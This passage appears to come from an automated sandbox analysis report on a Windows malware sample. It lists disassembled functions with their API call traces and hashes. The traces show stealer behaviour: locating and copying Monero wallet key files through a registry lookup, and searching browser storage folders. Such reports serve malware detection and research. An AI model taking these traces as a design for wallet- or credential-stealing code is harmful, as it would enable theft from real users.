                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 02d19e171d82e77a035015c266808bfd472c8262ecc477f9f95d3f83d7ef2fea
                                • Instruction ID: c67c2bad5d808cb9af4cc744c70b002fe2b4d1688ed4ca070464f62941cb931d
                                • Opcode Fuzzy Hash: 02d19e171d82e77a035015c266808bfd472c8262ecc477f9f95d3f83d7ef2fea
                                • Instruction Fuzzy Hash: 9951F8F3B056045FE3006D3DDC8576ABBDADBE4621F2A863DD6D4C37C8E93584058652
                                Function 01246097 Relevance: .1, Instructions: 89COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6be0f015ee98c018677d6a351031284feeae12d6047c2e465f7244b07b8cdb9a
                                • Instruction ID: 3e29a4ed90b1342e6017522154b4d71dba0b266e164610d4355ccf2c766d0d02
                                • Opcode Fuzzy Hash: 6be0f015ee98c018677d6a351031284feeae12d6047c2e465f7244b07b8cdb9a
                                • Instruction Fuzzy Hash: 50311AB251C304DFD711BF29DC8166EFBE5EF98710F06492EE6D483250E771A8448A97
                                Function 00E585B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00E58636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 00E586AA
                                • StrStrA.SHLWAPI(?,016CE9C0), ref: 00E586CF
                                • lstrcpyn.KERNEL32(010793D0,?,00000000), ref: 00E586EE
                                • lstrlen.KERNEL32(?), ref: 00E58701
                                • wsprintfA.USER32 ref: 00E58711
                                • lstrcpy.KERNEL32(?,?), ref: 00E58727
                                • StrStrA.SHLWAPI(?,016CE9F0), ref: 00E58754
                                • lstrcpy.KERNEL32(?,010793D0), ref: 00E587B4
                                • StrStrA.SHLWAPI(?,016CEC78), ref: 00E587E1
                                • lstrcpyn.KERNEL32(010793D0,?,00000000), ref: 00E58800
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: bb69db7f749989f6e496849832759145453c766032425fffb8c305de38912ae6
                                • Instruction ID: 0badbe7dbb1602e05af90707ae7eb01227d94d0cece33071555a01ae53c724f2
                                • Opcode Fuzzy Hash: bb69db7f749989f6e496849832759145453c766032425fffb8c305de38912ae6
                                • Instruction Fuzzy Hash: 0BF15A71E04118EFCB20DB64DD4CA9AB7B9EF88314F109559FA49F7244DB35AE04CBA1
                                Function 00E41F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E41F9F
                                • lstrlen.KERNEL32(016C88F8), ref: 00E41FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00E41FE3
                                • lstrlen.KERNEL32(00E71794), ref: 00E41FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4200E
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E42042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4204D
                                • lstrlen.KERNEL32(00E71794), ref: 00E42058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42075
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E42081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E420AC
                                • lstrlen.KERNEL32(?), ref: 00E420E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42104
                                • lstrcat.KERNEL32(00000000,?), ref: 00E42112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42139
                                • lstrlen.KERNEL32(00E71794), ref: 00E4214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4216B
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E42177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E421A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E421D4
                                • lstrlen.KERNEL32(?), ref: 00E421EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4220A
                                • lstrcat.KERNEL32(00000000,?), ref: 00E42218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42242
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4227F
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E4228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E422B1
                                • lstrcat.KERNEL32(00000000,016CD8E0), ref: 00E422B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E422F7
                                • lstrcat.KERNEL32(00000000), ref: 00E42304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E42356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E423BF
                                • DeleteFileA.KERNEL32(00000000), ref: 00E423F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E42444
                                • FindClose.KERNEL32(00000000), ref: 00E42453
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: caa87e68dc56b9c4db58cb13352550e495e8727ac6afeafe0d5accc06c8816c8
                                • Instruction ID: 4f230b223e1ae32be9d81c5357500fd03f7b83856400918b3e426e6432b6a79d
                                • Opcode Fuzzy Hash: caa87e68dc56b9c4db58cb13352550e495e8727ac6afeafe0d5accc06c8816c8
                                • Instruction Fuzzy Hash: 68E16031A112069BCB21EF64FC89AAE77F9AF44304F846069FA45B7305DB35ED45CBA0
                                Function 00E56410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56445
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E564AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E564E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56537
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: 7b1b84f6563765a0afa1752a7fdd4ed3cc31be7595e0324e005772040e53d258
                                • Instruction ID: d8cffcaa6fe553ca21b76674fe509004b2b60e87168cefef7b34760e88dc268e
                                • Opcode Fuzzy Hash: 7b1b84f6563765a0afa1752a7fdd4ed3cc31be7595e0324e005772040e53d258
                                • Instruction Fuzzy Hash: D2F19070E102059FCB21AF68E849AAE77F4AF44319F84A928FD55F7245DB38DC49CB90
                                Function 00E54370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E543A3
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E543D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E543FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E54409
                                • lstrlen.KERNEL32(\storage\default\), ref: 00E54414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00E5443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E54471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54498
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E544D7
                                • lstrcat.KERNEL32(00000000,?), ref: 00E544DF
                                • lstrlen.KERNEL32(00E71794), ref: 00E544EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54507
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E54513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 00E5451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00E54547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E545A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E545A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54601
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54653
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5467B
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E546AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 26cc52fb75f5f0b3e86220514509067db0153b648050f9274060d15e0fa68bf6
                                • Instruction ID: 4f9bfbfee3cc97896f196a13acbe7c7d502d3b7e8e16f74966d3bdc77737d6f8
                                • Opcode Fuzzy Hash: 26cc52fb75f5f0b3e86220514509067db0153b648050f9274060d15e0fa68bf6
                                • Instruction Fuzzy Hash: 63B1B2B1A112059BCB21EF78E849AAF77E8AF04309F446428FD85F7381DB34DD458BA0
                                Function 00E557A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E557D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E55804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E55868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E558C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E558D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E558F8
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E55961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55988
                                • lstrlen.KERNEL32(00E71794), ref: 00E5599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E559B9
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E559C5
                                • lstrlen.KERNEL32(016CD838), ref: 00E559D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E559F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E55A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E55A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E55AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E55B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E55B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E55B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55BB5
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E55BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E55C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55C70
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: a17d9e97e825f58b5b719bfd3cf267f70880d26aa21035a4c67770dba03588ae
                                • Instruction ID: f322c67836812857c94dd9ed1015072e4159d9bfa57a68ddfa31502baa9fc9bc
                                • Opcode Fuzzy Hash: a17d9e97e825f58b5b719bfd3cf267f70880d26aa21035a4c67770dba03588ae
                                • Instruction Fuzzy Hash: 9D02EF72A106059FCB21EF68E899AAE7BF4AF48315F54692CFD45B3301DB34DC498B90
                                Function 00E41190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E41120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E41135
                                  • Part of subcall function 00E41120: RtlAllocateHeap.NTDLL(00000000), ref: 00E4113C
                                  • Part of subcall function 00E41120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00E41159
                                  • Part of subcall function 00E41120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00E41173
                                  • Part of subcall function 00E41120: RegCloseKey.ADVAPI32(?), ref: 00E4117D
                                • lstrcat.KERNEL32(?,00000000), ref: 00E411C0
                                • lstrlen.KERNEL32(?), ref: 00E411CD
                                • lstrcat.KERNEL32(?,.keys), ref: 00E411E8
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4121F
                                • lstrlen.KERNEL32(016C88F8), ref: 00E4122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41251
                                • lstrcat.KERNEL32(00000000,016C88F8), ref: 00E41259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00E41264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00E41294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E412BA
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E412FF
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E4130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41335
                                • lstrcat.KERNEL32(00000000,?), ref: 00E4133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41378
                                • lstrcat.KERNEL32(00000000), ref: 00E41385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E413AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00E413D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41401
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4143D
                                  • Part of subcall function 00E5EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00E5EE12
                                • DeleteFileA.KERNEL32(?), ref: 00E41471
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
